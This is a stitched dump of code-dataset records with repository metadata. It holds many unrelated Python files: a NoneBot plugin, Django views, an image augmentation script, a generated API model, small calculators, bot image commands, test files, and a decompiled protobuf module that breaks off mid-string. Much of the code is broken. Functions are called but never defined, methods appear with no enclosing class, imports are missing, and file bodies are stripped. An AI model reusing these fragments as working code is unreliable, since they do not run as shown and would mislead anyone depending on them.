"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | plugins/uma/plugins/uma_whois/__init__.py | liangzimiao/miyubot | c2788712255e39348c8980c8ace2f6f75fb6621c | [
"Apache-2.0"
] | null | null | null | from nonebot.adapters.onebot.v11.event import MessageEvent
from nonebot.typing import T_State
from nonebot.adapters.onebot.v11 import Bot, Message
from plugins.uma.plugins.uma_whois.data_source import UmaWhois
from plugins.uma import chara
#matcher =on_endswith({'','?',''},priority=5)
matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois")
#matcher =on_startswith('',priority=5)
matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois") | 32.19403 | 94 | 0.623551 |
5f99e058ef025684556e0579c4ec1d81fb084ff1 | 8,288 | py | Python | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 1 | 2020-10-12T18:17:05.000Z | 2020-10-12T18:17:05.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 3 | 2019-11-19T20:41:50.000Z | 2021-06-10T21:48:44.000Z | analyzer/views.py | jonfang/CMPE295_DataAnalyzer | 6d74f55fa7e38ff8d25aecc388a5ed87c95037ae | [
"MIT"
] | 2 | 2019-10-30T23:18:57.000Z | 2019-11-23T00:23:17.000Z | from django.http import HttpResponse
from pyspark.sql import SparkSession
from django.shortcuts import render
from datetime import datetime
from core.chartfactory import createBarChart, createPieChart
from core.dataprocessor import DataProcessor
def sample(request):
"""
sample python report
"""
keys = ('Python', 'C++', 'Java', 'Perl', 'Scala', 'Lisp')
values = [10,8,6,4,2,1]
image_base64 = createBarChart(keys, values, 'Usage', 'Programming language usages')
return render(
request,
'analyzer/main.html',
{
'name': "Jon",
'date': datetime.now(),
'image_base64':image_base64,
}
)
#google play app report 1
#google play app report 2
#google play app report 3 | 35.418803 | 131 | 0.595077 |
5f9a0e11f9d9a926bf4cc162d77896b7f50869b6 | 4,668 | py | Python | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | null | null | null | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | 4 | 2020-07-24T19:31:51.000Z | 2022-03-12T00:41:28.000Z | utils/augment_data.py | caiobarrosv/object-detection-for-grasping | 2ac2f58700dff73032836ce33d3b98ebf3f29257 | [
"BSD-3-Clause"
] | null | null | null | from mxnet import nd
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
import utils.common as dataset_commons
import cv2
import numpy as np
import glob
import pandas as pd
from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform
from matplotlib import pyplot as plt
'''
This code only gives you a tool to visualize
the images pointed in the csv file and the related bounding boxes using openCV
'''
data_common = dataset_commons.get_dataset_files()
# classes_keys = [key for key in data_common['classes']]
if __name__ == "__main__":
source_images_path = data_common['image_folder']
source_csv_path = data_common['csv_path']
# TODO: Set the file save path
images_path_save = 'images_augmented/' # Folder that will contain the resized images
csv_path_save = 'images_augmented/csv/val_dataset.csv'
img_height = 300
img_width = 300
csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height)
if not os.path.exists(images_path_save):
try:
os.makedirs(images_path_save + 'csv')
except OSError as e:
if e.errno != errno.EEXIST:
raise
csv_converter.to_csv(csv_path_save, index=None)
print('Successfully converted to a new csv file.')
| 33.826087 | 130 | 0.633248 |
5f9a91b6b4cb83726c16979ae7cd27a95c8fd08d | 12,235 | py | Python | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | 1 | 2018-03-15T16:56:23.000Z | 2018-03-15T16:56:23.000Z | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | ultracart/models/apply_library_item_response.py | UltraCart/rest_api_v2_sdk_python | d734ea13fabc7a57872ff68bac06861edb8fd882 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplyLibraryItemResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.211735 | 213 | 0.621087 |
5f9b09cbcd120955bb173c4d9f5b1fd61f32f6e1 | 103 | py | Python | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 65 | 2017-03-21T09:15:40.000Z | 2022-02-01T23:43:08.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 100 | 2016-12-15T03:44:06.000Z | 2022-03-07T08:14:07.000Z | notebooks/python_recap/_solutions/python_rehearsal6.py | jonasvdd/DS-python-data-analysis | 835226f562ee0b0631d70e48a17c4526ff58a538 | [
"BSD-3-Clause"
] | 52 | 2016-12-19T07:48:52.000Z | 2022-02-19T17:53:48.000Z | np_pressures_hPa * math.exp(-gravit_acc * molar_mass_earth* height/(gas_constant*standard_temperature)) | 103 | 103 | 0.84466 |
5f9b8fe1beadc23d6a4c015ccb7948ee8af7a618 | 322 | py | Python | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | test/test_coverage.py | atupilojon/-resources--pytest | eae62b54828bb82dc534b37d9b46b83cb6d31c03 | [
"MIT"
] | null | null | null | from pytest import mark
# if setup.py present, code could be installed as library
# so that there's no need include path
# pip install -e .
from pytest_resources import do_lower_case
# from src.for_testing import do_lower_case
| 24.769231 | 57 | 0.773292 |
5f9c3b49af1837552a765743d83f19677ef7b0fe | 3,476 | py | Python | targets/simple_router/flow_radar_bm/change_bm.py | tsihang-zz/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 15 | 2018-08-21T10:49:38.000Z | 2021-06-23T14:33:32.000Z | targets/simple_router/flow_radar_bm/change_bm.py | harvard-cns/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 1 | 2017-10-16T07:49:06.000Z | 2017-10-16T13:45:36.000Z | targets/simple_router/flow_radar_bm/change_bm.py | USC-NSL/FlowRadar-P4 | 1b4f92b83257ba8f34475c098bce8b84daa35b7c | [
"Apache-2.0"
] | 6 | 2016-07-26T15:47:46.000Z | 2018-03-23T01:50:06.000Z | import re
import os
# copy required files
# change actions.c to add flow_radar lock
# change p4_pd_rpc_server.ipp
if __name__ == "__main__":
copy_files()
change_actions_c()
change_p4_pd_rpc_server_ipp()
change_p4_pd_rpc_thrift()
| 31.035714 | 148 | 0.649597 |
5f9c54619428b0b6d3296e3c0080e9ec17335d9c | 2,807 | py | Python | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | elecalc.py | shka86/py_calc | 780167bc10e2a74741ac9620dbc859c0d310e299 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# calculation tool for a bridge circuit with two input current sources
# two current sources can supply from both of top of the bridge and middle of the bridge
# define the voltage name as follows:
# Vp: voltage at the top of the bridge
# Vn: voltage at the middle of the bridge
if __name__ == '__main__':
main()
| 25.990741 | 88 | 0.540791 |
5f9c577bd20e78c6c12bbdda22baa4f5a81a595e | 618 | py | Python | Python/Armstrong_Number.py | shashwat-agarwal/hacktoberfest-2 | 552a4278ffd671603f8659562427b0f1ac5127a4 | [
"Apache-2.0"
] | 17 | 2020-10-02T03:28:33.000Z | 2020-10-24T04:08:30.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | [
"Apache-2.0"
] | 22 | 2020-10-01T20:00:56.000Z | 2020-10-31T01:56:10.000Z | Python/Armstrong_Number.py | shubhamgoel90/hacktoberfest | e7b1aa18485c4a080b2568910f82e98a5feb6f37 | [
"Apache-2.0"
] | 139 | 2020-10-01T19:51:40.000Z | 2020-11-02T19:58:19.000Z | #Program to check whether the number is an armstrong number or not
#Ask user to enter the number
number=int(input("Enter the number you want to check armstrong: "))
#To calculate the length of number entered.
order=len(str(number))
#Initialise sum to 0
sum=0
temp=number
while temp>0:
num=temp%10
sum+=num**order
temp//=10
if (number==sum):
print("The number you have entered is an Armstrong number.")
else:
print("The number you have entered is not an Armstrong number.")
#OUTPUT:
#Enter the number you want to check armstrong: 1634
#The number you have entered is an Armstrong number.
| 21.310345 | 68 | 0.723301 |
5f9c87648a4e17596d684c15485c9c92d81abb57 | 304 | py | Python | pyexlatex/models/format/hline.py | whoopnip/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | 4 | 2020-06-08T07:17:12.000Z | 2021-11-04T21:39:52.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | 24 | 2020-02-17T17:20:44.000Z | 2021-12-20T00:10:19.000Z | pyexlatex/models/format/hline.py | nickderobertis/py-ex-latex | 66f5fadc35a0bfdce5f1ccb3c80dce8885b061b6 | [
"MIT"
] | null | null | null | from pyexlatex.models.sizes.textwidth import TextWidth
from pyexlatex.models.format.rule import Rule
| 25.333333 | 65 | 0.710526 |
5f9d943e1c5e5e036c07d0eb1ed8c96b9fd06019 | 4,038 | py | Python | sixx/plugins/images.py | TildeBeta/6X | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 2 | 2018-03-06T20:39:49.000Z | 2018-03-17T04:28:57.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 2 | 2018-03-06T20:39:46.000Z | 2018-03-15T17:03:03.000Z | sixx/plugins/images.py | TildeBeta/TwitterImages | 1814eb8f394b7c25b49decdd7d7249567c85f30f | [
"MIT"
] | 1 | 2018-04-25T22:24:40.000Z | 2018-04-25T22:24:40.000Z | from math import sqrt
import asks
import datetime
import numpy as np
import random
from PIL import Image
from PIL.ImageDraw import Draw
from PIL.ImageEnhance import Brightness
from PIL.ImageFont import truetype
from curio import spawn_thread
from curious.commands import Context, Plugin, command
from io import BytesIO
from sixx.plugins.utils.pillow import add_noise, add_scanlines, antialiased_text, save_image
SCANLINES, NOISE, BOTH = range(3)
| 40.38 | 124 | 0.488856 |
5f9df6e37fc71858adef3ee969afe3699916d4a6 | 2,669 | py | Python | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | plugins/DonorlessOperation/__init__.py | j-h-m/Media-Journaling-Tool | 4ab6961e2768dc002c9bbad182f83188631f01bd | [
"BSD-3-Clause"
] | null | null | null | import logging
from maskgen import video_tools
import random
import maskgen.video_tools
import os
import maskgen
import json
plugin = "DonorPicker" | 38.128571 | 124 | 0.557887 |
5f9e0f831db1b36f8edc783c6c1bfaa61c116474 | 1,228 | py | Python | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 31 | 2017-09-13T13:40:59.000Z | 2022-01-25T16:55:19.000Z | track_model/eval_avg_scores.py | zhenyangli/lang-tracker | dddd808a22582573ab0a5e4c3dbf0ba054e42d61 | [
"BSD-3-Clause"
] | 4 | 2017-09-14T01:56:58.000Z | 2021-01-28T00:58:58.000Z | track_model/eval_avg_scores.py | QUVA-Lab/lang-tracker | 6cb3630471765565b6f2d34a160f0cd51d95a082 | [
"BSD-2-Clause-FreeBSD"
] | 9 | 2017-09-28T03:22:08.000Z | 2021-01-19T10:56:44.000Z | import caffe
import numpy as np
import os
import sys
import track_model_train as track_model
import train_config
max_iter = 1000
if __name__ == '__main__':
config = train_config.Config()
eval_avg_scores(config)
| 29.95122 | 90 | 0.643322 |
5f9e1b47610239b65145f24fa61ab7d89533b94e | 1,968 | py | Python | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 1 | 2018-05-31T17:29:30.000Z | 2018-05-31T17:29:30.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 8 | 2015-02-20T16:22:12.000Z | 2019-04-25T23:57:43.000Z | tests/group_test.py | gekkeharry13/api-python | b18d1694c19f5f972a126ee9ff3d3971a08815cb | [
"Apache-2.0"
] | 8 | 2015-02-28T06:56:15.000Z | 2020-01-02T22:42:09.000Z | #
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mock import patch
import conjur
api = conjur.new_from_key('foo', 'bar')
group = api.group('v1/admins')
| 37.132075 | 82 | 0.757622 |
5f9e9628295536489ee271571858b5c113c24c7c | 99,362 | py | Python | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/generated/protocolbuffers/Social_pb2.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: D:\dev\TS4\_deploy\Client\Releasex64\Python\Generated\protocolbuffers\Social_pb2.py
# Compiled at: 2020-12-13 14:24:09
# Size of source mod 2**32: 103336 bytes
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
import protocolbuffers.Consts_pb2 as Consts_pb2
import protocolbuffers.Chat_pb2 as Chat_pb2
import protocolbuffers.S4Common_pb2 as S4Common_pb2
import protocolbuffers.Localization_pb2 as Localization_pb2
import protocolbuffers.Exchange_pb2 as Exchange_pb2
DESCRIPTOR = descriptor.FileDescriptor(name='Social.proto',
package='EA.Sims4.Network',
serialized_pb='\n\x0cSocial.proto\x12\x10EA.Sims4.Network\x1a\x0cConsts.proto\x1a\nChat.proto\x1a\x0eS4Common.proto\x1a\x12Localization.proto\x1a\x0eExchange.proto"v\n\x0fSocialFriendMsg\x12\r\n\x05simId\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x0c\n\x04note\x18\x03 \x01(\t\x12\x0e\n\x06prefix\x18\x04 \x01(\t\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x12\n\ncheatForce\x18\x06 \x01(\x08",\n\x18SocialPersonaResponseMsg\x12\x10\n\x08personas\x18\x01 \x03(\t"\x7f\n\x15SocialGenericResponse\x12\r\n\x05error\x18\x01 \x01(\r\x121\n\x08msg_type\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x0e\n\x06postId\x18\x03 \x01(\x0c\x12\x14\n\x0cpostParentId\x18\x04 \x01(\x0c"\x02\n\x14SocialPlayerInfoList\x12B\n\x07players\x18\x01 \x03(\x0b21.EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo\x1a\x01\n\nPlayerInfo\x12\x13\n\x0bAccountName\x18\x01 \x01(\t\x12\x14\n\x0cAccountNotes\x18\x02 \x01(\t\x128\n\x08presence\x18\x03 \x01(\x0e2&.EA.Sims4.Network.OnlinePresenceStatus\x12\x15\n\rOnlineStatus2\x18\x04 \x01(\t\x12\x11\n\tNucleusId\x18\t \x01(\x04\x12\x11\n\tPlayerBio\x18\n \x01(\t\x12\x18\n\x10exclude_reported\x18\x0b \x01(\x08\x12\x15\n\rIsUserBlocked\x18\x0c \x01(\x08"a\n\x0fSocialSearchMsg\x12\x0e\n\x06prefix\x18\x01 \x01(\t\x12>\n\x0esearch_results\x18\x02 \x03(\x0b2&.EA.Sims4.Network.LocalizedStringToken"=\n\x12OriginErrorMessage\x12\x11\n\terrorcode\x18\x01 \x01(\r\x12\x14\n\x0cerrormessage\x18\x02 \x01(\t"\x97\x01\n\x1bSocialInviteResponseMessage\x12\x14\n\x0cinvitationid\x18\x01 \x01(\t\x12\x16\n\x0einvitationtype\x18\x02 \x01(\r\x12\x18\n\x10inviternucleusid\x18\x03 \x01(\x04\x12\x19\n\x11accepternucleusid\x18\x04 \x01(\x04\x12\x15\n\ractionSuccess\x18\x05 \x01(\x08"J\n\x13SocialCassandraTest\x123\n\x06opcode\x18\x01 \x01(\x0e2#.EA.Sims4.Network.CassandraTestCode"\x88\x01\n\x1eSocialFriendListRequestMessage\x12\x12\n\naccount_id\x18\x01 \x01(\x04\x12\x11\n\tfriend_id\x18\x02 \x01(\x04\x12\x13\n\x0baddress_str\x18\x03 \x01(\t\x12\x12\n\nobject_str\x18\x04 \x01(\t\x12\x16\n\x0ereply_proxy_id\x18\x05 \x01(\x04"_\n!SocialRequestNucleusIdFromPersona\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x13\n\x0bpersonaName\x18\x02 \x01(\t\x12\x12\n\nmessage_id\x18\x03 \x01(\r"^\n"SocialNucleusIdFromPersonaResponse\x12\x11\n\trequestid\x18\x01 \x01(\x04\x12\x11\n\tnucleusid\x18\x02 \x01(\x04\x12\x12\n\nmessage_id\x18\x03 \x01(\r"S\n\x15SocialExchangeMessage\x12:\n\x08envelope\x18\x01 \x01(\x0b2(.EA.Sims4.Network.ExchangeSocialEnvelope"+\n\x16SocialFollowersMessage\x12\x11\n\tsfim_blob\x18\x01 \x03(\x0c"\x02\n\x15SocialFeedItemMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x127\n\tfeed_type\x18\x02 \x01(\x0e2$.EA.Sims4.Network.SocialFeedItemType\x120\n\x08metadata\x18\x03 \x01(\x0b2\x1e.EA.Sims4.Network.TrayMetadata\x12\x11\n\tnucleusid\x18\x04 \x01(\x04\x12\x0f\n\x07persona\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x04\x12\x1a\n\x12follower_nucleusid\x18\x07 \x01(\x04\x12\x18\n\x10follower_persona\x18\x08 \x01(\t\x12@\n\x0efollowers_blob\x18\t \x01(\x0b2(.EA.Sims4.Network.SocialFollowersMessage\x12\x18\n\x10is_maxis_curated\x18\n \x01(\x08"Z\n!SocialFeedItemUnserializedMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c\x12\x0c\n\x04data\x18\x02 \x01(\x0c\x12\x16\n\x0ecount_override\x18\x03 \x01(\x04"d\n\x18SocialWallCommentMessage\x12\x0c\n\x04uuid\x18\x01 \x01(\x0c\x12\x11\n\tauthor_id\x18\x02 \x01(\x04\x12\x16\n\x0eauthor_persona\x18\x03 \x01(\t\x12\x0f\n\x07message\x18\x04 \x01(\t"\x01\n\x1cSocialGetWallCommentsMessage\x12\x11\n\tnucleusid\x18\x01 
\x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x15\n\rstarting_uuid\x18\x03 \x01(\x0c\x12\x13\n\x0bnum_results\x18\x04 \x01(\r\x12<\n\x08messages\x18\x05 \x03(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage\x12\x0e\n\x06hidden\x18\x06 \x01(\x08\x12\x18\n\x10exclude_reported\x18\x07 \x01(\x08"\x82\x01\n\x1cSocialPostWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12;\n\x07message\x18\x03 \x01(\x0b2*.EA.Sims4.Network.SocialWallCommentMessage"U\n\x1eSocialDeleteWallCommentMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x12\n\ngallery_id\x18\x02 \x01(\x0c\x12\x0c\n\x04uuid\x18\x03 \x01(\x0c"\x01\n\x1cSocialRequestFeedWallMessage\x12\x13\n\x0bending_uuid\x18\x01 \x01(\x0c\x129\n\x08messages\x18\x02 \x03(\x0b2\'.EA.Sims4.Network.SocialFeedItemMessage\x12R\n\x15unserialized_messages\x18\x03 \x03(\x0b23.EA.Sims4.Network.SocialFeedItemUnserializedMessage\x12\x11\n\tnum_items\x18\x04 \x01(\r"m\n\x1dSocialRequestFollowersMessage\x12\x10\n\x08playerid\x18\x01 \x01(\x04\x12\n\n\x02id\x18\x02 \x01(\t\x12\x19\n\x11prev_last_persona\x18\x03 \x01(\t\x12\x13\n\x0bnum_request\x18\x04 \x01(\r";\n\x1eSocialRequestIgnoreListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04"\x01\n\x1eSocialGetPlayerInfoListMessage\x12\x19\n\x11player_nucleus_id\x18\x01 \x01(\x04\x12U\n\x10player_info_list\x18\x02 \x03(\x0b2;.EA.Sims4.Network.SocialGetPlayerInfoListMessage.PlayerInfo\x1aU\n\nPlayerInfo\x12\x12\n\nnucleus_id\x18\x01 \x01(\x04\x12\x16\n\x0eorigin_persona\x18\x02 \x01(\t\x12\x1b\n\x13first_party_persona\x18\x03 \x01(\t"X\n\x1cSocialCommentPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x11\n\tcommentid\x18\x02 \x01(\x0c\x12\x12\n\ncommentKey\x18\x03 \x01(\t"D\n\x18SocialBioPetitionMessage\x12\x11\n\tnucleusid\x18\x01 \x01(\x04\x12\x15\n\rbio_nucleusid\x18\x02 \x01(\x04"+\n\x18SocialFeedRemovalMessage\x12\x0f\n\x07feed_id\x18\x01 \x01(\x0c"\x8f\x12\n\x14SocialControlMessage\x12/\n\x06opcode\x18\x01 \x02(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12.\n\x05subop\x18\x02 \x01(\x0e2\x1f.EA.Sims4.Network.SocialOpTypes\x12\x15\n\rtransactionId\x18\x03 \x01(\x04\x12\x0e\n\x06result\x18d \x01(\r\x12J\n\x12getwallcommentsmsg\x18\x04 \x01(\x0b2..EA.Sims4.Network.SocialGetWallCommentsMessage\x12J\n\x12postwallcommentmsg\x18\x05 \x01(\x0b2..EA.Sims4.Network.SocialPostWallCommentMessage\x12N\n\x14deletewallcommentmsg\x18\x06 \x01(\x0b20.EA.Sims4.Network.SocialDeleteWallCommentMessage\x124\n\tfriendmsg\x18\x07 \x01(\x0b2!.EA.Sims4.Network.SocialFriendMsg\x12@\n\x0fgenericresponse\x18\x08 \x01(\x0b2\'.EA.Sims4.Network.SocialGenericResponse\x12:\n\nplayerinfo\x18\t \x01(\x0b2&.EA.Sims4.Network.SocialPlayerInfoList\x12:\n\nfeedsubmsg\x18\n \x01(\x0b2&.EA.Sims4.Network.SocialFeedSubMessage\x12:\n\x0fsearchresultmsg\x18\x0b \x01(\x0b2!.EA.Sims4.Network.SocialSearchMsg\x12H\n\x11inviteresponsemsg\x18\x0c \x01(\x0b2-.EA.Sims4.Network.SocialInviteResponseMessage\x129\n\x0boriginerror\x18\r \x01(\x0b2$.EA.Sims4.Network.OriginErrorMessage\x12B\n\x13socialcassandratest\x18\x0e \x01(\x0b2%.EA.Sims4.Network.SocialCassandraTest\x12T\n\x1asocialfriendlistrequestmsg\x18\x0f \x01(\x0b20.EA.Sims4.Network.SocialFriendListRequestMessage\x12^\n!socialrequestnucleusidfrompersona\x18\x10 \x01(\x0b23.EA.Sims4.Network.SocialRequestNucleusIdFromPersona\x12`\n"socialnucleusidfrompersonaresponse\x18\x11 \x01(\x0b24.EA.Sims4.Network.SocialNucleusIdFromPersonaResponse\x12F\n\x15socialexchangemessage\x18\x12 
\x01(\x0b2\'.EA.Sims4.Network.SocialExchangeMessage\x12T\n\x1csocialrequestfeedwallmessage\x18\x13 \x01(\x0b2..EA.Sims4.Network.SocialRequestFeedWallMessage\x12A\n\x0cstat_tickers\x18\x15 \x01(\x0b2+.EA.Sims4.Network.ExchangeStatTickerMessage\x12L\n\x14comment_petition_msg\x18\x16 \x01(\x0b2..EA.Sims4.Network.SocialCommentPetitionMessage\x12B\n\x0efeedremovalmsg\x18\x17 \x01(\x0b2*.EA.Sims4.Network.SocialFeedRemovalMessage\x12D\n\x10bio_petition_msg\x18\x18 \x01(\x0b2*.EA.Sims4.Network.SocialBioPetitionMessage\x12B\n\x0cfb_event_msg\x18\x19 \x01(\x0b2,.EA.Sims4.Network.SocialFacebookEventMessage\x12M\n\x14requestfollowers_msg\x18\x1a \x01(\x0b2/.EA.Sims4.Network.SocialRequestFollowersMessage\x12O\n\x15responsefollowers_msg\x18\x1b \x01(\x0b20.EA.Sims4.Network.SocialResponseFollowersMessage\x12O\n\x15requestignorelist_msg\x18\x1c \x01(\x0b20.EA.Sims4.Network.SocialRequestIgnoreListMessage\x12W\n\x1dresponse_player_info_list_msg\x18\x1d \x01(\x0b20.EA.Sims4.Network.SocialGetPlayerInfoListMessage\x12_\n\x1eplayer_identification_list_msg\x18\x1e \x01(\x0b27.EA.Sims4.Network.ServerPlayerIdentificationListMessage\x12@\n\rcandidate_msg\x18\x1f \x01(\x0b2).EA.Sims4.Network.SocialCandidatesMessage\x12P\n\x16evaluation_results_msg\x18 \x01(\x0b20.EA.Sims4.Network.SocialEvaluationResultsMessage\x12>\n\rcg_update_msg\x18! \x01(\x0b2\'.EA.Sims4.Network.SocialCGUpdateMessage"7\n\x13SocialInvalidateMsg\x12\x13\n\x0bcache_index\x18\x01 \x01(\r\x12\x0b\n\x03key\x18\x02 \x01(\x0c"t\n"SocialControlQueueBroadcastMessage\x127\n\x07control\x18\x01 \x01(\x0b2&.EA.Sims4.Network.SocialControlMessage\x12\x15\n\tfriendIds\x18\x03 \x03(\x04B\x02\x10\x01"5\n\x10LifeEventMessage\x12\x0c\n\x04type\x18\x01 \x01(\r\x12\x13\n\x07sim_ids\x18\x02 \x03(\x06B\x02\x10\x01"Q\n\x1aSocialFacebookEventMessage\x12\x10\n\x08objectId\x18\x01 \x02(\t\x12\x13\n\x0baccessToken\x18\x02 \x02(\t\x12\x0c\n\x04guid\x18\x03 \x02(\t"\x01\n"SocialCandidateStatisticSubmessage\x12\x11\n\tremote_id\x18\x01 \x01(\x0c\x12\x13\n\x0bviews_count\x18\x02 \x01(\r\x12\x12\n\nwins_count\x18\x03 \x01(\r\x12\x10\n\x08platform\x18\x04 \x01(\r\x12\x10\n\x08category\x18\x05 \x01(\r\x12\x18\n\x0cwas_reported\x18\x06 \x01(\x08B\x02\x18\x01\x12\x19\n\x11expires_epoch_sec\x18\x07 \x01(\x04"\x01\n\x17SocialCandidatesMessage\x12\r\n\x05count\x18\x01 \x01(\r\x12\x1c\n\x14platform_restriction\x18\x02 \x01(\r\x12\x1c\n\x14category_restriction\x18\x03 \x01(\r\x12\x11\n\tchallenge\x18\x04 \x01(\t\x12\x0e\n\x06digest\x18\x05 \x01(\x0c\x12H\n\ncandidates\x18\x06 \x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage\x12\x19\n\x11expire_epoch_secs\x18\x07 \x01(\x04"W\n\x1eSocialEvaluationResultsMessage\x12\x12\n\nwinner_ids\x18\x01 \x03(\t\x12\x11\n\tloser_ids\x18\x02 